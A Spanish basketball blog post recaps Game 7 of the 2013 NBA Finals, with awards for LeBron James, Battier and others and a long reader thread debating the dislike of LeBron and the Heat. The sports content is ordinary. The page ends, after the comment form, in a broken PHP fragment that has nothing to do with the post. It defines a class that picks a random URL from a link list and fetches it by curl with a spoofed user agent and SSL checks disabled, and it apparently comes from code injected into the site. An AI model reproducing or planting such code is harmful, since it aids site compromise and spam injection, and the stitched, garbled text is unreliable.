La Crónica: Firmado, LeBron James

21 de June de 2013 por MagicJohnson32

lebron ring

Qué hermoso llega a ser el baloncesto. En determinadas circunstancias, léase un séptimo partido de las Finales de la NBA entre los dos mejores equipos del planeta, no hay nada que se le pueda comparar. Más aún cuando ese partido sirve como culminación a una serie maravillosa, unas de las mejores Finales que nos ha dejado la NBA en su historia y que, finalmente, coronó a los Miami Heat como campeones 2013 y elevó a LeBron James a la categoría que todavía muchos se atreven a discutirle. Gloria para James y respeto máximo para los Spurs, magníficos rivales, competidores extraordinarios hasta el último instante de un partido y una eliminatoria memorables.

Pese a todo -su condición de foráneos y la dolorosa derrota en el 6º partido- no se achicaron los Spurs. La primera mitad ofreció poco que paladear, especialmente en un arranque extremadamente áspero que vio a los texanos situarse con 7 puntos de ventaja (11-4). No cundió el pánico en el bando local, que reaccionó de la mano de Wade antes de la entrada en escena de Shane Battier. El ex Duke, que no jugó un solo segundo en el séptimo contra los Pacers, apareció en el partido para darle un vuelco inmediato con tres triples prácticamente consecutivos (16-21) que cambiaron la inercia y pusieron a los Heat a las riendas. A partir de ese momento, los Spurs siempre fueron a remolque. Pero jamás, hasta que sonó la bocina, se rindieron.

Poco a poco, el juego de los Heat fue gravitando cada vez más en torno a LeBron y Wade, a quienes la defensa de los Spurs seguían flotando, de manera incluso más descarada de lo que venía siendo norma en toda la serie, pese a que ambos se mostraron especialmente acertados en los lanzamientos de media-larga distancia. No importaba que LeBron enchufase sus triples con comodidad, ni que Wade se luciese con varias suspensiones por encima de Danny Green, los Spurs seguían ciñéndose a su plan de juego con fe inquebrantable. Y, en cierta manera, les funcionó, porque entre Tim Duncan y Kawhi Leonard se las arreglaron para agarrarse al partido en todo momento. A los Spurs les falló la anotación exterior, esos corner threes que son esenciales en los esquemas de Popovich. Especialmente sangrante resultó la actuación de Danny Green, aspirante a MVP tras el quinto partido de las Finales y reducido a la nada más absoluta en los dos encuentros decisivos. Anoche, además de quedarse en un 1 de 12 en tiros de campo, Green fue un compendio de malas decisiones y un caso ejemplar de lo que hace la confianza (y la falta de ella) en un jugador de baloncesto.

duncan wadeSin tiro exterior, sin apenas aportación de Parker más allá del minuto 16 de partido (sólo metió dos tiros libres en el resto del encuentro), con un Ginóbili más acertado en la anotación pero de nuevo errático con los pases, Leonard y Duncan tuvieron que dejarlo todo para tratar de contener esa manada desbocada en que se transforma LeBron James. No hubo manera. En esta ocasión, la táctica de Popovich de atrincherarse en la pintura y dejar espacio a James y a Wade para que lancen desde el exterior fracasó estrepitosamente porque, además, Battier y Chalmers también sacaron partido y entre ambos compensaron la falta de aportaciones de Bosh, Allen y Miller (0 de 14, 0 puntos entre los tres).

Cuatro triples de los Heat en los últimos minutos del tercer cuarto habrían resultado definitivos ante cualquier otro equipo, pero no frente a los Spurs. Así, entramos en los 12 minutos finales con todo en juego (71-72) y la impresión de que los Heat estaban siendo superiores pero que sólo hacía falta unos fallos en los tiros exteriores de Miami para que el anillo volase hacia San Antonio. Sin embargo, los tiros de Miami siguieron entrando. En el primer ataque Battier anotó su 4º triple sin fallo; poco después, Wade y LeBron anotaron desde media distancia; a continuación, quinto triple de Battier. El esfuerzo de los Spurs fue realmente titánico, emocionante de ver. Ginóbili anotó dos canastas extraordinarias, Tim Duncan le sacó un 2+1 y la quinta falta a Bosh, y Leonard metió a 2 minutos para la conclusión un triple que dejaba el marcador 88-90.

Entonces, tras varios fallos tanto de los Heat como de los Spurs -que dispusieron de un triple abierto de Leonard y de un semi gancho cómodo de Duncan-, apareció el Rey para reclamar su trono. A 30 segundos para el final, la defensa de los Spurs optó una vez más por dejar espacio a LeBron. Ante la llegada de un falso bloqueo de Chalmers, LeBron dribló hacia su derecha, Tony Parker se quedó a medias en la ayuda y James aprovechó para elevarse desde 6 metros por encima de un lejano Leonard y anotar la canasta definitiva (88-95). Esa suspensión fue la rúbrica de James a su partido, a la eliminatoria y a la temporada que le distingue como el gran dominador de su generación. Ya no importa que los Spurs tuviesen ganado el 6º partido antes del triple agónico de Ray Allen. La historia la escriben los ganadores y ésta viene del puño y letra de LeBron James.

PREMIOS

MVP: LeBron James nos ha dejado una de las mejores actuaciones individuales de la historia en un séptimo partido de la final. 37 puntos, 13 rebotes, 4 asistencias, 2 robos y un gran acierto en los últimos minutos del partido. Alegrémonos de poder disfrutar en directo de sus actuaciones.

kawhiSorpresa: Se ha pasado las finales prácticamente sentado en el banquillo pero ha aparecido en el último partido. Shane Battier anotó 6 triples de 8 intentos y se fue hasta los 18 puntos. Buena parte del anillo es suyo.

Decepción: A Danny Green le ha pesado la presión en los partidos definitivos de la final. Ayer se quedó en 5 puntos con un 1 de 12 en tiros de campo y dejó la sensación de estar completamente superado por la situación.

Esfuerzo en vano: El de todos los Spurs pero sobre todo el de Tim Duncan y Kawhi Leonard. El alero de los Spurs continuó jugando como un veterano y acabó con 19 puntos y 16 rebotes mientras que “The Big Fundamental” asumió la responsabilidad en los momentos calientes y llevó a su equipo hasta la orilla. Anotó 24 puntos, capturó 12 rebotes y 4 robos. Una bandeja suya y el posterior palmeo pudieron empatar el partido en el último minuto pero la bola no quiso entrar y Duncan se lamentará durante mucho tiempo por esa jugada.

HIGHLIGHTS

Imágenes | AP Photos / Getty Images

Comenta

18 comentarios a esta entrada

  1. ababel147 dice:
    #1

    Mi pregunta para lo más veteranos del lugar.. Los Lakers de Magic y los Bulls de Jordan, despertaban tantas antipatías como estos Miami y LeBron? Es que por muy buenos que sean, no acabo de empatizar con ellos para nada, y me da la sensación de que si hubiera vivido las épocas pasadas que he nombrado, sí que hubiera sido admirador de esos equipos y de sus figuras..
    En fin, reflexiones estúpidas aparte, enhorabuena al campeón y al MVP, y especial mención a San Antonio. Gracias a los dos equipos por brindarme la mejor final NBA que he vivido.

      Citar

  2. Denise dice:
    #2

    ababel147: Mi pregunta para lo más veteranos del lugar.. Los Lakers de Magic y los Bulls de Jordan, despertaban tantas antipatías como estos Miami y LeBron? Es que por muy buenos que sean, no acabo de empatizar con ellos para nada, y me da la sensación de que si hubiera vivido las épocas pasadas que he nombrado, sí que hubiera sido admirador de esos equipos y de sus figuras..En fin, reflexiones estúpidas aparte, enhorabuena al campeón y al MVP, y especial mención a San Antonio. Gracias a los dos equipos por brindarme la mejor final NBA que he vivido.

    Yo por mi parte no sé por qué hay tanto hater de Miami, supongo que será que cuando uno es bueno, los demás tienden a tenerle envidia.
    Personalmente, me caen peor los Spurs por aburridos y marrulleros (aunque esta versión es menos de eso que la de hace 8 años). Y los Pistons de Rasheed, Ben, Hamilton y Billups me caian como el culo tambien.

      Citar

  3. Rodericco dice:
    #3

    Yo diría que hay tanto hater de Miami principalmente por LeBron: se fue de Cleveland cuando éstos estaban construyendo un proyecto ilusionante alrededor de él; su estilo no es vistoso sino espectacular debido al físico, en el sentido en que da la sensación de que sería el mismo animal dominante en fútbol, fútbol americano, tenis o lo que quieras, y que, sobre todo, este equipo es muy parecido al Real Madrid: los dos tienen al animal del momento pero su estilo de juego no se basa tanto en un sistema colectivo como en un encaje de piezas. Sería como un coche hipertuneado que nunca llegará a tener el encanto de un Ferrari.

      Citar

  4. txusma dice:
    #4

    No sé. Las canastas de 6 metros que se clava Lebron en los últimos minutos con el defensor delante no son gracias a su físico. Que su físico sea privilegiado no nos puede hacer olvidar que estamos ante un jugador repleto tb de talento y de una capacidad competitiva admirable. No me compraré nunca su camiseta (y si flirteaba con la posibilidad de comprarme la de Duncan) pero tampoco seré nunca uno de sus haters.

    Felicidades al campeón y veremos qué caminos toma ahora Miami. La temporada de Chris Bosh ha sido muy pobre y las rodillas de Wade empiezan a pedir descanso a gritos. Hay trabajo.

      Citar

  5. dunc dice:
    #5

    Os doy mi visión como hater de Miami, que creo que es compartida por muchos:

    Yo lo que odio no es ni a Lebron, ni a Wade ni a Bosh. Al único que odio per se es al Birdman.

    Lo que odio es que 3 tios que por separado y con algunos secundarios podrían haber sido aspirantes a todo (Wade fue campeón, Lebron finalista y Bosh algo menos pero era una megaestrella) hayan renunciado a competir entre ellos para juntarse en pos de un anillo.
    Me parece que la competición queda desvirtuada con esta renuncia de quizás 3 de los 10 mejores jugadores del momento (Lebron el numero 1, Wade top 5 y Bosh no sabría decir pero en Toronto era una megaestrella) a competir entre ellos. Por eso desearé que pierdan siempre.

    Si comparo esto con un equipo como los Spurs, donde sus estrellas principales fueron drafteadas (Duncan en el numero 1, pero Parker y Manudo muy abajo), forjado a base de trabajo, secundarios baratos y europeos repescados, me parece un equipo mucho más “honrado” y “trabajado”.

    Que quede constancia que los Heat que quedaron campeones con Wade me caian de lujo, y que Lebron nunca me ha caido mal y le reconozco como el numero 1. Y si, los big three de Boston y Lakers tampoco me hacen gracia, pero aún asi no se juntaron 3 top 10 de la liga en ninguno de los dos casos.

    Perdon por el tochaco

      Citar

  6. Denise dice:
    #6

    dunc: Os doy mi visión como hater de Miami, que creo que es compartida por muchos:Yo lo que odio no es ni a Lebron, ni a Wade ni a Bosh. Al único que odio per se es al Birdman.Lo que odio es que 3 tios que por separado y con algunos secundarios podrían haber sido aspirantes a todo (Wade fue campeón, Lebron finalista y Bosh algo menos pero era una megaestrella) hayan renunciado a competir entre ellos para juntarse en pos de un anillo.Me parece que la competición queda desvirtuada con esta renuncia de quizás 3 de los 10 mejores jugadores del momento (Lebron el numero 1, Wade top 5 y Bosh no sabría decir pero en Toronto era una megaestrella) a competir entre ellos. Por eso desearé que pierdan siempre.Si comparo esto con un equipo como los Spurs, donde sus estrellas principales fueron drafteadas (Duncan en el numero 1, pero Parker y Manudo muy abajo), forjado a base de trabajo, secundarios baratos y europeos repescados, me parece un equipo mucho más “honrado” y “trabajado”.Que quede constancia que los Heat que quedaron campeones con Wade me caian de lujo, y que Lebron nunca me ha caido mal y le reconozco como el numero 1. Y si, los big three de Boston y Lakers tampoco me hacen gracia, pero aún asi no se juntaron 3 top 10 de la liga en ninguno de los dos casos.Perdon por el tochaco

    A mi esa postura me parece muy radical. Sí se han juntado, pero este negocio afortunadamente tiene restricciones y eso hace que se queden agujeros en la plantilla, y no sea facil adquirir a un grupo de jugadores validos en torno a ellos, esto no es un negocio como el modelo deportivo europeo donde todo se basa en el dinero.
    Y sobre Nash-Kobe-Pau y Howard, en agosto todos eran Top 3 de la Liga en su puesto, y el Big 4 de Boston en su momento casi que también.

      Citar

  7. Simon dice:
    #7

    Hombre Denise no se puede comparar, la explicación de Dunc podría valer para mi tambien. No soy un hater pero hay un buen puñado de equipos que prefiero que ganen antes que ellos.
    Digo que Lakers o Boston no es lo mismo puesto que eso se han hecho mediante traspasos en los que los equipos buscan su propio beneficio y además ningún jugador a perdonado ni una peseta. Lakers o Boston armaron esos equipos gracias a la pericia de sus GM con los traspasos, creo que es obvio que no es lo mismo que estar libres los 3 y juntarse y decir: ey! nos vamos a jugar a Miami los 3 para jugar a Miami??
    Es lícito? si, por supuesto pero eso es una lacra que los haters de James no le van a perdonar, creo que es una losa que ya no se va a quitar nunca, ni aunque gane 4 o 5 anillos más en proyectos totalmente distintos. Seguramente James se retire considerado como uno de los 5 mejores de la historia con 3 o 4 anillos mínimo, pero estoy seguro que si hubiera conseguido esos anillos en Cleveland no habría tanto hater ni tantas dudas sobre él.

    Totalmente de acuerdo con lo que dice Txus. Lebron tiene un físico privilegiado, pero eso no puede tapar el inmensísimo talento que tiene. Puede que no sea el que más bonito lo haga pero su talento es innegable, que algunos hablan de Lebron como si simplemente fuera una máquina física cuando por talento puro y duro no tiene nada que envidiar a NADIE de la liga.

      Citar

  8. HisRoyalAirness dice:
    #8

    dunc:
    Os doy mi visión como hater de Miami, que creo que es compartida por muchos:

    Yo lo que odio no es ni a Lebron, ni a Wade ni a Bosh. Al único que odio per se es al Birdman.

    Lo que odio es que 3 tios que por separado y con algunos secundarios podrían haber sido aspirantes a todo (Wade fue campeón, Lebron finalista y Bosh algo menos pero era una megaestrella) hayan renunciado a competir entre ellos para juntarse en pos de un anillo.
    Me parece que la competición queda desvirtuada con esta renuncia de quizás 3 de los 10 mejores jugadores del momento (Lebron el numero 1, Wade top 5 y Bosh no sabría decir pero en Toronto era una megaestrella) a competir entre ellos. Por eso desearé que pierdan siempre.

    Si comparo esto con un equipo como los Spurs, donde sus estrellas principales fueron drafteadas (Duncan en el numero 1, pero Parker y Manudo muy abajo), forjado a base de trabajo, secundarios baratos y europeos repescados, me parece un equipo mucho más “honrado” y “trabajado”.

    Que quede constancia que los Heat que quedaron campeones con Wade me caian de lujo, y que Lebron nunca me ha caido mal y le reconozco como el numero 1. Y si, los big three de Boston y Lakers tampoco me hacen gracia, pero aún asi no se juntaron 3 top 10 de la liga en ninguno de los dos casos.

    Perdon por el tochaco

    Estoy de acuerdo punto por punto. Y añado, eso lo hicieron jugadores de la misma conferencia, la cual es la más débil, de lejos, de la liga. Y de la otra opción que había? Vamos a coger a Ray Allen.

    Eso sin hablar de las lesiones de Bynum, Rose y Rondo (y no vengáis con Kobe porque en el Oeste hay tela suficiente sin los Lakers)

      Citar

  9. MagicJohnson32 dice:
    #9

    ababel147:
    Mi pregunta para lo más veteranos del lugar.. Los Lakers de Magic y los Bulls de Jordan, despertaban tantas antipatías como estos Miami y LeBron? Es que por muy buenos que sean, no acabo de empatizar con ellos para nada, y me da la sensación de que si hubiera vivido las épocas pasadas que he nombrado, sí que hubiera sido admirador de esos equipos y de sus figuras..
    En fin, reflexiones estúpidas aparte, enhorabuena al campeón y al MVP, y especial mención a San Antonio. Gracias a los dos equipos por brindarme la mejor final NBA que he vivido.

    Te sorprenderías hasta qué punto se cuestionaba a Jordan en su momento. Primero fue que estaba a la sombra de los realmente grandes, Magic y Bird; luego había muchos partidarios de Wilkins, Drexler o incluso de Pippen. ¿Crees que la diferencia entre Jordan y Drexler era menor que la que hay entre LeBron y Durant, por ejemplo? Lo que quiero decir es que es normal que se discuta a James, porque se ha hecho con todos los grandes jugadores. A Kobe se le ha medido en relación a Iverson, a Carter, a Pierce, a McGrady… y siempre ha habido partidarios del otro, fuese quien fuese.

    El factor de la antipatía hacia LeBron viene por varios factores, creo. ‘The Decision’ pesó mucho, supuso un cambio grande en la percepción sobre él. Lo de juntarse con dos súper estrellas no ayudó nada. Y me parece que también tiene bastante que ver su aparente actitud sobre la pista y unas condiciones físicas tan superiores que eclipsan todo lo demás.

      Citar

  10. HisRoyalAirness dice:
    #10

    MagicJohnson32: Te sorprenderías hasta qué punto se cuestionaba a Jordan en su momento. Primero fue que estaba a la sombra de los realmente grandes, Magic y Bird; luego había muchos partidarios de Wilkins, Drexler o incluso de Pippen. ¿Crees que la diferencia entre Jordan y Drexler era menor que la que hay entre LeBron y Durant, por ejemplo? Lo que quiero decir es que es normal que se discuta a James, porque se ha hecho con todos los grandes jugadores. A Kobe se le ha medido en relación a Iverson, a Carter, a Pierce, a McGrady… y siempre ha habido partidarios del otro, fuese quien fuese.

    El factor de la antipatía hacia LeBron viene por varios factores, creo. ‘The Decision’ pesó mucho, supuso un cambio grande en la percepción sobre él. Lo de juntarse con dos súper estrellas no ayudó nada. Y me parece que también tiene bastante que ver su aparente actitud sobre la pista y unas condiciones físicas tan superiores que eclipsan todo lo demás.

    Y el hecho de coger el MVP y gritar “Hate now!” es para darle dos bofetadas

      Citar

  11. Ruxixón dice:
    #11

    Yeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeah!!!! Heat Repeat! increible porque mi sensación partido tras partido es que los Spurs debían haber ganado esto por 5-2 (sé que es imposible pero así lo siento,sólo he visto en 2 partidos superiores a San Antonio).

    Auténticas leyendas Popovich,Duncan y estos Spurs bajo su legado,eso no lo va a quitar nadie,aunque al final lo que vale es ese precioso trofeo.Si no gana Miami espero y deseo que Tim acabe con un anillo su carrera.

    Simon:
    Es lícito? si, por supuesto pero eso es una lacra que los haters de James no le van a perdonar, creo que es una losa que ya no se va a quitar nunca, ni aunque gane 4 o 5 anillos más en proyectos totalmente distintos. Seguramente James se retire considerado como uno de los 5 mejores de la historia con 3 o 4 anillos mínimo, pero estoy seguro que si hubiera conseguido esos anillos en Cleveland no habría tanto hater ni tantas dudas sobre él.

    El odio a LeBron viene desde el día 1 que llega a la NBA con el logo “The King” o “The Chosen One” con sus mamarrachadas en el parqué,dispuesto a dejar por detrás a jugadores en activo como Kobe o a superar el legado de leyendas del basket como Jordan.Evidentemente ayuda lo de irse a Miami pero el núcleo de haters de LeBron se ha forjado durante sus años de Cleveland.

      Citar

  12. MagicJohnson32 dice:
    #12

    Ruxixón:
    Yeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeah!!!! Heat Repeat!

    Enhorabuena, Ruxi 😉

      Citar

  13. Ruxixón dice:
    #13

    MagicJohnson32: Enhorabuena, Ruxi

    Gracias crack!

    Por cierto,aclaro lo de antes que no me expresé bien:

    “…increible porque mi sensación partido tras partido es que los Spurs debían haber ganado esto por 5-2 (sé que es imposible pero así lo siento,sólo he visto A MIAMI en 2 partidos superiores a San Antonio)”

      Citar

  14. Denise dice:
    #14

    Ruxixón:

    El odio a LeBron viene desde el día 1 que llega a la NBA con el logo “The King” o “The Chosen One” con sus mamarrachadas en el parqué,dispuesto a dejar por detrás a jugadores en activo como Kobe o a superar el legado de leyendas del basket como Jordan.Evidentemente ayuda lo de irse a Miami pero el núcleo de haters de LeBron se ha forjado durante sus años de Cleveland.

    Pero por qué no sois mas objetivos y menos demagogicos…
    Si Kobe se pone Black Mamba, el otro Big Ticket, el otro Superman, el otro Cyborg, el otro The Answer, el otro Diesel, etc…todo está muy bonito, en cambio si Lebron se pone un mote …a criticarlo

    Y para qué iba jugar Lebron si no es para superar a leyendas? Acaso alguien juega a perder? a ser un mierda mas en la NBA? No es una gran cualidad la ambición y el trabajo de superación?

    No sé, creo en general que hay que ser menos radical y mas objetivo.

    A mi los Spurs me caen como el culo pero valoro la gran temporada que han hecho.

      Citar

  15. maravich dice:
    #15

    San Antonio ha merecido ganar el anillo, pero es deporte.
    En estos momentos se entiende en toda su extensión la moraleja de la película de Woody Allen, “Match Point”. En la vida en general y en el deporte en particular, el límite entre el éxito y el fracaso es tan ínfima y tan casual que asusta.

    Gran final. Popovich, simplemente el mejor. Enorme su trabajo toda la temporada, increíble su trabajo en las Finales.
    Sólo un pero: LeBRON.

      Citar

  16. MagicJohnson32 dice:
    #16

    Pues tengo que decir una cosa sobre Popovich. Yo he sido el primero en ponerlo por las nubes toda la regular season y en los Playoffs, pero creo que ha fallado en los últimos partidos de las finales. En el tramo final del 6º queda en evidencia al quitar a Duncan y ver que un rebote ofensivo le cuesta el anillo. Y en el 7º ¿en serio que flotarle a LeBron es todo lo que se le ocurre para intentar pararlo? ¿Cuántos triples hacía falta que metiese para empezar a puntearle los tiros? ¿Con 5 no bastaba? No sé, a mí Pops me parece un monstruo, un genio, pero sin ir más lejos creo que Spoelstra ha hecho mejores ajustes.

      Citar

  17. jose_dantley dice:
    #17

    Lo de flotarle en el último creo que fue fruto de cierta desesperación. Para mí todo el último tramo del 6º es una gran mancha. Lástima porque de haber ganado hubiera estado tan arriba en el escalafón de todos los tiempos que daría miedo pensarlo.

    En el tema LeBron-hater, en mi caso no llega a odio, es simple disgusto, un disgusto amargo. ¿Por qué? La principal razón es pura estética. Por no irme hacia atrás en el tiempo, vemos a Kobe y es arte en movimiento, a Durant y esa suspensión con esos brazos larguísimos, incluso a gente no tan arriba como Melo y esa finura en los movimiento, o incluso grandes como Duncan o pequeños como Harden cortando defensas a base de clase pura. Y luego … ves a LeBron y … las mete pero … ya está, las mete, de todos los colores, de fuerza, de técnica, de tiro, pero no son bonitas.

    Si a eso le unes la fea forma de desarrollarse la “decisión”, lo supermegacutre sobrevalorada que es la ciudad de Miami, que enfrente tenía a un equipo hecho artesanalmente durante muchos años … pues queda eso, que acabas admirándolo y que aceptas a regañadientes que es el mejor con diferencia -demoledoras las declaraciones de frustración de Durant- y que está entre los mejores de todos los tiempos.

      Citar

  18. Sancho88 dice:
    #18

    Es penoso ver cómo poneis a parir al mejor jugador del mundo. O sea, haterismo puro y duro sin ningún sentido, críticas que no se aguantan bajo ningún punto de vista. De verdad creeis en el romanticismo de el big three de Lakers, Celtics, etc.? Por qué Bryant es puro estilismo y LeBron un obero Manolo de la vida? Yo flipo.

    Mucha gente le habéis cogido manía a este chaval sin ningún motivo. A mí me parece de puta madre que diga, eh, soy bueno, voy a superar a Jordan en anillos y a Jabbar en puntos, a Magic Johnson en triples dobles y a todo dios en lo que sea. A mí, eso, me parece respetar el baloncesto. Y LeBron es un tipo solidario con la bola que no piensa solo en sus putos números. Él juega y suma, y además gana, que creo que es lo que más jode entre muchos aficionados. Como casi nadie era de los Heat, ahora es muy fácil ser hater y decir que han desvirtuado la competición y ese tipo de gilipoyeces. Si LeBron hubiera firmado por Lakers o Celtics nadie diría eso, me juego lo que queráis. Entonces, Lakers también han hundido el Este por llevarse a Howard, o Celtics también hundieron el Oeste hace años por llevarse a Garnett y Allen no? Venga, menuda sarta de sandeces.

    Reconoced que es uno de los mejores jugadores de la historia, que lo está demostrando, y disfrutad un poco de su juego. Realmente da asco ver la envidia que genera este muchacho. Que sí, que alguna muestra de soberbia ha tenido en su carrera, pero se le critica gratuitamente. Él solo aprovecha su físico y destroza al rival, además, con una muñeca que cada día se achanta menos desde media-larga distancia, con un tiro por pulir (eso es innegable), pero con AMOR POR EL BALONCESTO, y eso, amigos, no se puede criticar…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>